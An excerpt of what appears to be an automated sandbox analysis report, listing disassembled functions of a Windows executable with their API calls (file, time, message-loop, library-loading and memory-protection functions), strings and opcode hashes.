                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                              • String ID:
                                                              • API String ID: 1414292761-0
                                                              • Opcode ID: 91fa05e150d9c307a439854c656c2672c2c32d377ded871299a09b117920b84d
                                                              • Instruction ID: e0cd49a6d4aa761e9e4e31942e24e69db59b18557f70218ee1063fd8dd87b010
                                                              • Opcode Fuzzy Hash: 91fa05e150d9c307a439854c656c2672c2c32d377ded871299a09b117920b84d
                                                              • Instruction Fuzzy Hash: 5951B072610216AFEF259E64CC81EBB77A9EB84754F155639FD18F6180EB34EC40C7A0
                                                              Function 00E871E8 Relevance: 9.1, APIs: 6, Instructions: 98timeCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00E87240
                                                                • Part of subcall function 00E82C72: GetVersionExW.KERNEL32(?), ref: 00E82C97
                                                              • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00E87264
                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 00E8727E
                                                              • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00E87291
                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00E872A1
                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00E872B1
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Time$File$System$Local$SpecificVersion
                                                              • String ID:
                                                              • API String ID: 2092733347-0
                                                              • Opcode ID: f032cacbf7d4c9ee716864ceb9f9d77a1a9a72df38bb8c58347f396873fc831c
                                                              • Instruction ID: 1070dc25c0b6d38feb89add4a541c8c9e6ca8d91570b7bd82e110b57fccc39c2
                                                              • Opcode Fuzzy Hash: f032cacbf7d4c9ee716864ceb9f9d77a1a9a72df38bb8c58347f396873fc831c
                                                              • Instruction Fuzzy Hash: 1B31F676108345AFC700DFA9C98499BB7E8FF88754F045A1EF999D3210E730E549CBA6
                                                              Function 00E92C53 Relevance: 9.0, APIs: 6, Instructions: 42windowsynchronizationCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1796 e92c53-e92c6c WaitForSingleObject 1797 e92c6e-e92c6f 1796->1797 1798 e92cb4-e92cb6 1796->1798 1799 e92c71-e92c81 PeekMessageW 1797->1799 1800 e92c83-e92c9e GetMessageW TranslateMessage DispatchMessageW 1799->1800 1801 e92ca4-e92cb1 WaitForSingleObject 1799->1801 1800->1801 1801->1799 1802 e92cb3 1801->1802 1802->1798
                                                              APIs
                                                              • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00E92C5F
                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00E92C79
                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00E92C8A
                                                              • TranslateMessage.USER32(?), ref: 00E92C94
                                                              • DispatchMessageW.USER32(?), ref: 00E92C9E
                                                              • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00E92CA9
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                                                              • String ID:
                                                              • API String ID: 2148572870-0
                                                              • Opcode ID: dd5965cca7aa5e0baf2e55c5c892e1494b6993194637946d589f11903ebabe1a
                                                              • Instruction ID: d185a83d082ac0aacd85cfff5a58e416a4fb43b74f4e43c8d854a21273c922a2
                                                              • Opcode Fuzzy Hash: dd5965cca7aa5e0baf2e55c5c892e1494b6993194637946d589f11903ebabe1a
                                                              • Instruction Fuzzy Hash: 8DF03C72A01119BBCF206BA2DC8CDDFBFBCEF46355B104011FA06E6051D678D509C7A0
                                                              Function 00E8241A Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 111fileCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1803 e8241a-e82426 1804 e82428-e8242a 1803->1804 1805 e8242f-e8243a 1803->1805 1806 e8254a-e8254e 1804->1806 1807 e8244b 1805->1807 1808 e8243c-e82449 GetStdHandle 1805->1808 1809 e8244f-e82450 1807->1809 1808->1809 1810 e82451-e8245c 1809->1810 1811 e8245e-e82462 1810->1811 1812 e824a3-e824be WriteFile 1810->1812 1814 e824c4-e824c8 1811->1814 1815 e82464-e8246d 1811->1815 1813 e824c0-e824c2 1812->1813 1813->1814 1816 e82542-e82549 1813->1816 1814->1816 1817 e824ca-e824ce 1814->1817 1818 e8246f 1815->1818 1819 e82474-e82491 WriteFile 1815->1819 1816->1806 1817->1816 1820 e824d0-e824e2 call e8171b 1817->1820 1818->1819 1819->1813 1821 e82493-e8249f 1819->1821 1825 e824e4-e824ec 1820->1825 1826 e82535-e8253d call e81a09 1820->1826 1821->1815 1823 e824a1 1821->1823 1823->1813 1825->1810 1828 e824f2-e824f7 1825->1828 1826->1816 1828->1810 1829 e824fd-e82530 1828->1829 1829->1810
                                                              APIs
                                                              • GetStdHandle.KERNEL32(000000F5,?,?,00000000,00000000,00E8A066,?,?,?,?,?,00E8A820,00EBD56C,?,00E8B1B3,00010000), ref: 00E8243E
                                                              • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00E82485
                                                              • WriteFile.KERNEL32(00000008,?,00E8B1B3,00010000,00000000,02FCED32,?,?,?,00000000,00000000,00E8A066,?,?,?,?), ref: 00E824B1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FileWrite$Handle
                                                              • String ID: D+$D+
                                                              • API String ID: 4209713984-589233338
                                                              • Opcode ID: fe752818cbf5c7df9ea9dd4166573da14f536955fc44763952789d1cfec7ca45
                                                              • Instruction ID: d1b25bcc5195d9cbb55d25addb266c567e654e1d08ea05247ccfc7bdd87754af
                                                              • Opcode Fuzzy Hash: fe752818cbf5c7df9ea9dd4166573da14f536955fc44763952789d1cfec7ca45
                                                              • Instruction Fuzzy Hash: 943125715043159FDB14EF20D918BAA77A6FB85718F00551DFA9D772A0CB70AC48CBB2
                                                              Function 00E984F7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 63COMMONLIBRARYCODE
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1834 e984f7-e98501 1835 e98573-e98576 1834->1835 1836 e98578 1835->1836 1837 e98503-e98511 1835->1837 1838 e9857a-e9857e 1836->1838 1839 e9851a-e98536 LoadLibraryExW 1837->1839 1840 e98513-e98516 1837->1840 1843 e98538-e98541 GetLastError 1839->1843 1844 e9857f-e98585 1839->1844 1841 e98518 1840->1841 1842 e9858e-e98590 1840->1842 1845 e98570 1841->1845 1842->1838 1846 e9856b-e9856e 1843->1846 1847 e98543-e98558 call e9a913 1843->1847 1844->1842 1848 e98587-e98588 FreeLibrary 1844->1848 1845->1835 1846->1845 1847->1846 1851 e9855a-e98569 LoadLibraryExW 1847->1851 1848->1842 1851->1844 1851->1846
                                                              APIs
                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,00E985BA,?,?,00EE86C8,00000000,?,00E986E5,00000004,InitializeCriticalSectionEx,00EAB054,InitializeCriticalSectionEx,00000000), ref: 00E98588
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FreeLibrary
                                                              • String ID: api-ms-
                                                              • API String ID: 3664257935-2084034818
                                                              • Opcode ID: e9d890422229fb6a402450f65ca64b5b0ad2c42b0bbe22a95032db99923ca5fc
                                                              • Instruction ID: f8a8461a4128585fe0c1deb7138308fd89d9f94ab64afd8293d011fabe451e80
                                                              • Opcode Fuzzy Hash: e9d890422229fb6a402450f65ca64b5b0ad2c42b0bbe22a95032db99923ca5fc
                                                              • Instruction Fuzzy Hash: 0611E771E416259FDF228B689E40B9933A4BF17764F161120F845F72E0DF70ED0886D1
                                                              Function 00E8FDCB Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 35COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1852 e8fdcb-e8fdea GetClassNameW 1853 e8fdec-e8fe01 call e87d24 1852->1853 1854 e8fe12-e8fe14 1852->1854 1859 e8fe11 1853->1859 1860 e8fe03-e8fe0f FindWindowExW 1853->1860 1856 e8fe1f-e8fe21 1854->1856 1857 e8fe16-e8fe18 1854->1857 1857->1856 1859->1854 1860->1859
                                                              APIs
                                                              • GetClassNameW.USER32(?,?,00000050), ref: 00E8FDE2
                                                              • SHAutoComplete.SHLWAPI(?,00000010), ref: 00E8FE19
                                                                • Part of subcall function 00E87D24: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,00E82FEC,?,?,?,00E82F99,?,-00000002,?,00000000,?), ref: 00E87D3A
                                                              • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 00E8FE09
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                              • String ID: @Ut$EDIT
                                                              • API String ID: 4243998846-2065656831
                                                              • Opcode ID: 8e0edc8fcd91e0f19f10833bf1ec6bccff2724ede9ea9fba7313fb2f1f25ff40
                                                              • Instruction ID: 4aae8f4df094ad247db15900da324c66b2813da524af61c565c6db97ea31fb00
                                                              • Opcode Fuzzy Hash: 8e0edc8fcd91e0f19f10833bf1ec6bccff2724ede9ea9fba7313fb2f1f25ff40
                                                              • Instruction Fuzzy Hash: 40F0E2326002286ADB206622AC49FDF72AC9F86B10F440064BA08BA183D364E94286B6
                                                              Function 00E8FE36 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 34comCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 00E86B47: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00E86B62
                                                                • Part of subcall function 00E86B47: LoadLibraryW.KERNEL32(?,?,00E8583E,Crypt32.dll,00000000,00E858C2,?,?,00E858A4,?,?,?,?), ref: 00E86B84
                                                              • OleInitialize.OLE32(00000000), ref: 00E8FE4F
                                                              • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00E8FE86
                                                              • SHGetMalloc.SHELL32(00ECEA00), ref: 00E8FE90
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                                              • String ID: riched20.dll$3Qo
                                                              • API String ID: 3498096277-4232643773
                                                              • Opcode ID: 54f8f10410f27ef4d6a7a533c966e55db7b5a7bfb87ad21c0be0d26919c23970
                                                              • Instruction ID: 0f76d4433dd395b2f1ec341067186bc717a47f864d8f31a28222c167a2ded03b
                                                              • Opcode Fuzzy Hash: 54f8f10410f27ef4d6a7a533c966e55db7b5a7bfb87ad21c0be0d26919c23970
                                                              • Instruction Fuzzy Hash: 4BF0FFB1900249AFCB10AF96D8899EFFBFCEF84705F40405AE855F2251D7B456498BA1
                                                              Function 00E8582B Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00E86B47: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00E86B62
                                                                • Part of subcall function 00E86B47: LoadLibraryW.KERNEL32(?,?,00E8583E,Crypt32.dll,00000000,00E858C2,?,?,00E858A4,?,?,?,?), ref: 00E86B84
                                                              • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00E8584A
                                                              • GetProcAddress.KERNEL32(00EBCFE8,CryptUnprotectMemory), ref: 00E8585A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AddressProc$DirectoryLibraryLoadSystem
                                                              • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                                              • API String ID: 2141747552-1753850145
                                                              • Opcode ID: 218c6dde4eee8b350af690151fbe262aa130e0e3f07f21c740b3590ef306a2ad
                                                              • Instruction ID: 773f8199e0354358ca64022913bd2b8a8ee0ad5f6feeb6d83889094ba762d810
                                                              • Opcode Fuzzy Hash: 218c6dde4eee8b350af690151fbe262aa130e0e3f07f21c740b3590ef306a2ad
                                                              • Instruction Fuzzy Hash: D9E0DF70800F019ED7202B35BA48B027AD06F1A704F14982FF1C9F7240DEB0E0448B00
                                                              Function 00E81E20 Relevance: 7.6, APIs: 5, Instructions: 111filetimeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateFileW.KERNEL32(?,?,?,00000000,00000003,08000000,00000000), ref: 00E81E9F
                                                              • GetLastError.KERNEL32 ref: 00E81EAC
                                                              • CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800), ref: 00E81EE2
                                                              • GetLastError.KERNEL32 ref: 00E81EEA
                                                              • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000), ref: 00E81F39
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: File$CreateErrorLast$Time
                                                              • String ID:
                                                              • API String ID: 1999340476-0
                                                              • Opcode ID: fea55c413cd24777aedb207589b964b17e15ad33af9631a975196e9dd2423cd1
                                                              • Instruction ID: 4bc559b85b0638e34d43abb61e5c93fb9757eb1cfaa4686bdf8aa7941002ba7c
                                                              • Opcode Fuzzy Hash: fea55c413cd24777aedb207589b964b17e15ad33af9631a975196e9dd2423cd1
                                                              • Instruction Fuzzy Hash: 78314730A447416FE730AF20CC45BD6BBACBF05324F101759F9ADA21D0C7B0A88ACB95
                                                              Function 00E905A8 Relevance: 7.5, APIs: 5, Instructions: 38windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00E905B9
                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00E905CA
                                                              • IsDialogMessageW.USER32(00020482,?), ref: 00E905DE
                                                              • TranslateMessage.USER32(?), ref: 00E905EC
                                                              • DispatchMessageW.USER32(?), ref: 00E905F6
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Message$DialogDispatchPeekTranslate
                                                              • String ID:
                                                              • API String ID: 1266772231-0
                                                              • Opcode ID: 0bfbd303308703ea5957c5db5940de29c2cd31fcf69a6ae625bbdd13e3a71172
                                                              • Instruction ID: 4fb7ae4b6b4e9e8592bf4339bc735c6922fc915a59c1c683534d50703cb187c2
                                                              • Opcode Fuzzy Hash: 0bfbd303308703ea5957c5db5940de29c2cd31fcf69a6ae625bbdd13e3a71172
                                                              • Instruction Fuzzy Hash: 0CF0D0B190112DAF8F20ABA2EC8CEDB7FBCEF452547804415B515F2111E768D509CBB0
                                                              Function 00E858AA Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 67COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00E8582B: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00E8584A
                                                                • Part of subcall function 00E8582B: GetProcAddress.KERNEL32(00EBCFE8,CryptUnprotectMemory), ref: 00E8585A
                                                              • GetCurrentProcessId.KERNEL32(?,?,?,00E858A4), ref: 00E85938
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AddressProc$CurrentProcess
                                                              • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed$D+
                                                              • API String ID: 2190909847-4049555249
                                                              • Opcode ID: 8626e23dcabca0ce273ae5213ab0705f93363d1e8dce1b799e25c3da5d5c4260
                                                              • Instruction ID: 1500956edbfc24e263ab59d5b0e71cf110478d85706998b97440ef5c251b106c
                                                              • Opcode Fuzzy Hash: 8626e23dcabca0ce273ae5213ab0705f93363d1e8dce1b799e25c3da5d5c4260
                                                              • Instruction Fuzzy Hash: 0C113632A01A21EFDB057F21AC4197E3BA9EF89734B106056FC5D7B251DE34AD068B94
                                                              Function 00E82380 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 56COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetFilePointer.KERNEL32(000000FF,00000000,00000000,00000001), ref: 00E823C7
                                                              • GetLastError.KERNEL32 ref: 00E823D4
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorFileLastPointer
                                                              • String ID: D+$D+
                                                              • API String ID: 2976181284-589233338
                                                              • Opcode ID: af78dbb2ef0d6e774bb89b4c2d2c76bd1bc50215638efa493e705315bc612fda
                                                              • Instruction ID: e94ac75a419eb6add2940900e1b238f42767e15d00f2c92bfdb59b212fa0827d
                                                              • Opcode Fuzzy Hash: af78dbb2ef0d6e774bb89b4c2d2c76bd1bc50215638efa493e705315bc612fda
                                                              • Instruction Fuzzy Hash: 2711C631600602AFD724A624CC85BA6B3E8EB45374F50562DE25EF25D0D7B4ED4A8760
                                                              Function 00E8C370 Relevance: 6.3, APIs: 4, Instructions: 307COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _strncpy$Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                              • String ID:
                                                              • API String ID: 2527496121-0
                                                              • Opcode ID: 054195ddb092ea550138ab2f295da9af057e8697d9e74bf526dbc98edc3b7983
                                                              • Instruction ID: eda3524891f79a2564beaece872b7b67e86bf5e474484c1642bb471dbcf7aa33
                                                              • Opcode Fuzzy Hash: 054195ddb092ea550138ab2f295da9af057e8697d9e74bf526dbc98edc3b7983
                                                              • Instruction Fuzzy Hash: 97B170B1508300DFC714EF6AEC91E2677E5FB88718F24553EE44DB3261E732A80A9B91
                                                              Function 00E81CD5 Relevance: 6.1, APIs: 4, Instructions: 56fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetStdHandle.KERNEL32(000000F6), ref: 00E81CE5
                                                              • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 00E81CFD
                                                              • GetLastError.KERNEL32 ref: 00E81D2F
                                                              • GetLastError.KERNEL32 ref: 00E81D4E
                                                              Memory Dump Source
